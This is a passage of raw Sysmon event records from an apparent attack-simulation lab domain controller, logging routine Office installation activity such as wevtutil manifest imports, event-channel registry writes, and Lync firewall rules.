14:55:57.438{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072234Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:57.438{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072233Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:57.438{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072232Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:57.438{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EB7D-607E-940B-00000000BB01}5580C:\Windows\System32\wevtutil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000072231Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:57.438{A7A01FEF-EB7A-607E-7E0B-00000000BB01}51165340C:\Program Files\Microsoft Office\root\integration\integrator.exe{A7A01FEF-EB7D-607E-940B-00000000BB01}5580C:\Windows\System32\wevtutil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Microsoft Office\root\integration\integrator.exe+9a2c1|C:\Program Files\Microsoft Office\root\integration\integrator.exe+9a470|C:\Program Files\Microsoft Office\root\integration\integrator.exe+2f9c6d|C:\Program Files\Microsoft Office\root\integration\integrator.exe+2efed5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000072230Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:57.440{A7A01FEF-EB7D-607E-940B-00000000BB01}5580C:\Windows\System32\wevtutil.exe10.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Eventing Command Line UtilityMicrosoft® Windows® Operating SystemMicrosoft Corporationwevtutil.exewevtutil.exe im "C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\msoutilstat.etw.man" /rf:"C:\Program Files\Microsoft Office\root\Office16\msoetwres.dll" /mf:"C:\Program Files\Microsoft Office\root\Office16\msoetwres.dll"C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=91803E340A7E7AFDF95A8031F6EF3F3E,SHA256=DCFD99FE08A5D46C52E810FE2F9CC15AC82008975C0A731A11773B11ADE0F3CC,IMPHASH=51FFA3B7FBD1EF82ECE0730B54406E64{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\Integration\Integrator.exeintegrator.exe /U /Extension /Msi /License PRIDName= PackageGUID="9AC08E99-230B-47e8-9721-4577B7F124EA" PackageRoot="C:\Program Files\Microsoft Office\root" 13241300x800000000000000072229Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:57.313{A7A01FEF-EB7D-607E-920B-00000000BB01}6676C:\Windows\System32\wevtutil.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\WordChannel\TypeDWORD (0x00000003) 13241300x800000000000000072228Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:57.313{A7A01FEF-EB7D-607E-920B-00000000BB01}6676C:\Windows\System32\wevtutil.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\WordChannel\ChannelAccessO:BAG:SYD:(A;;0x2;;;S-1-15-2-1)(A;;0xf0007;;;SY)(A;;0x7;;;BA)(A;;0x7;;;SO)(A;;0x3;;;IU)(A;;0x3;;;SU)(A;;0x3;;;S-1-5-3)(A;;0x3;;;S-1-5-33)(A;;0x1;;;S-1-5-32-573) 13241300x800000000000000072227Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:57.313{A7A01FEF-EB7D-607E-920B-00000000BB01}6676C:\Windows\System32\wevtutil.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\WordChannel\IsolationDWORD (0x00000000) 13241300x800000000000000072226Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:57.313{A7A01FEF-EB7D-607E-920B-00000000BB01}6676C:\Windows\System32\wevtutil.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\WordChannel\EnabledDWORD (0x00000000) 13241300x800000000000000072225Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:57.313{A7A01FEF-EB7D-607E-920B-00000000BB01}6676C:\Windows\System32\wevtutil.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\WordChannel\OwningPublisher{daf0b914-9c1c-450a-81b2-fea7244f6ffa} 10341000x800000000000000072224Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:57.188{A7A01FEF-EB7D-607E-930B-00000000BB01}60086556C:\Windows\system32\conhost.exe{A7A01FEF-EB7D-607E-920B-00000000BB01}6676C:\Windows\System32\wevtutil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072223Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:57.188{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EB7D-607E-930B-00000000BB01}6008C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000072222Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:57.188{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072221Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:57.188{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072220Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:57.188{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072219Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:57.188{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072218Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:57.188{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EB7D-607E-920B-00000000BB01}6676C:\Windows\System32\wevtutil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000072217Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:57.188{A7A01FEF-EB7A-607E-7E0B-00000000BB01}51165340C:\Program Files\Microsoft Office\root\integration\integrator.exe{A7A01FEF-EB7D-607E-920B-00000000BB01}6676C:\Windows\System32\wevtutil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Microsoft Office\root\integration\integrator.exe+9a2c1|C:\Program Files\Microsoft Office\root\integration\integrator.exe+9a470|C:\Program Files\Microsoft Office\root\integration\integrator.exe+2f9c6d|C:\Program Files\Microsoft Office\root\integration\integrator.exe+2efed5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000072216Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:57.185{A7A01FEF-EB7D-607E-920B-00000000BB01}6676C:\Windows\System32\wevtutil.exe10.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Eventing Command Line UtilityMicrosoft® Windows® Operating SystemMicrosoft Corporationwevtutil.exewevtutil.exe im "C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\wordEtw.man" /rf:"C:\Program Files\Microsoft Office\root\Office16\wwlib.dll" /mf:"C:\Program Files\Microsoft Office\root\Office16\wwlib.dll"C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=91803E340A7E7AFDF95A8031F6EF3F3E,SHA256=DCFD99FE08A5D46C52E810FE2F9CC15AC82008975C0A731A11773B11ADE0F3CC,IMPHASH=51FFA3B7FBD1EF82ECE0730B54406E64{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\Integration\Integrator.exeintegrator.exe /U /Extension /Msi /License PRIDName= PackageGUID="9AC08E99-230B-47e8-9721-4577B7F124EA" PackageRoot="C:\Program Files\Microsoft Office\root" 23542300x800000000000000072215Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:57.173{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DC1CB2F33151BA828516BA4EA9C50468,SHA256=A6DDF029EFCE5B9C0CD296E73AC836270711859E3C0830EE0AF449CE8A1280EB,IMPHASH=00000000000000000000000000000000falsetrue 13241300x800000000000000072214Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:57.063{A7A01FEF-B626-607E-1500-00000000BB01}1496C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch\EpochDWORD (0x00000645) 13241300x800000000000000072213Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:57.063{A7A01FEF-B626-607E-1500-00000000BB01}1496C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{4127FD87-446C-4A37-8920-CEDA59976D8B}v2.26|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Domain|App=C:\Program Files\Microsoft Office\root\Office16\UcMapi.exe|Name=Microsoft Lync UcMapi| 10341000x800000000000000072212Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:57.063{A7A01FEF-B626-607E-1500-00000000BB01}14965992C:\Windows\system32\svchost.exe{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\fwbase.dll+1594|c:\windows\system32\fwbase.dll+13f6|c:\windows\system32\mpssvc.dll+dbc2|c:\windows\system32\mpssvc.dll+3014e|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072211Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:57.063{A7A01FEF-B626-607E-1500-00000000BB01}14965992C:\Windows\system32\svchost.exe{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\fwbase.dll+1594|c:\windows\system32\fwbase.dll+13f6|c:\windows\system32\mpssvc.dll+2fc35|c:\windows\system32\mpssvc.dll+2fb4e|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x800000000000000072210Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:57.063{A7A01FEF-B626-607E-1500-00000000BB01}1496C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch\EpochDWORD (0x00000644) 13241300x800000000000000072209Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:57.063{A7A01FEF-B626-607E-1500-00000000BB01}1496C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{DA91CA72-CCBD-48F5-A919-84693B7B70A9}v2.26|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Domain|App=C:\Program Files\Microsoft Office\root\Office16\UcMapi.exe|Name=Microsoft Lync UcMapi| 10341000x800000000000000072208Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:57.063{A7A01FEF-B626-607E-1500-00000000BB01}14965992C:\Windows\system32\svchost.exe{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\fwbase.dll+1594|c:\windows\system32\fwbase.dll+13f6|c:\windows\system32\mpssvc.dll+dbc2|c:\windows\system32\mpssvc.dll+3014e|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072207Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:57.063{A7A01FEF-B626-607E-1500-00000000BB01}14965992C:\Windows\system32\svchost.exe{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\fwbase.dll+1594|c:\windows\system32\fwbase.dll+13f6|c:\windows\system32\mpssvc.dll+2fc35|c:\windows\system32\mpssvc.dll+2fb4e|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x800000000000000072206Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:57.048{A7A01FEF-B626-607E-1500-00000000BB01}1496C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch\EpochDWORD (0x00000643) 13241300x800000000000000072205Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:57.048{A7A01FEF-B626-607E-1500-00000000BB01}1496C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{30389C35-B5C1-4478-B14F-E946DE9764AB}v2.26|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Domain|App=C:\Program Files\Microsoft Office\root\Office16\Lync.exe|Name=Microsoft Lync| 10341000x800000000000000072204Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:57.048{A7A01FEF-B626-607E-1500-00000000BB01}14965992C:\Windows\system32\svchost.exe{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\fwbase.dll+1594|c:\windows\system32\fwbase.dll+13f6|c:\windows\system32\mpssvc.dll+dbc2|c:\windows\system32\mpssvc.dll+3014e|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072203Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:57.048{A7A01FEF-B626-607E-1500-00000000BB01}14965992C:\Windows\system32\svchost.exe{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\integration\integrator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\fwbase.dll+1594|c:\windows\system32\fwbase.dll+13f6|c:\windows\system32\mpssvc.dll+2fc35|c:\windows\system32\mpssvc.dll+2fb4e|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x800000000000000072202Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:57.032{A7A01FEF-B626-607E-1500-00000000BB01}1496C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch\EpochDWORD (0x00000642) 13241300x800000000000000072201Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:57.032{A7A01FEF-B626-607E-1500-00000000BB01}1496C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{91DA7D1C-947D-482B-B400-AFCAD99ACC23}v2.26|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Domain|App=C:\Program Files\Microsoft Office\root\Office16\Lync.exe|Name=Microsoft Lync| 10341000x800000000000000072200Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:57.032{A7A01FEF-B626-607E-1500-00000000BB01}14965992C:\Windows\system32\svchost.exe{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft 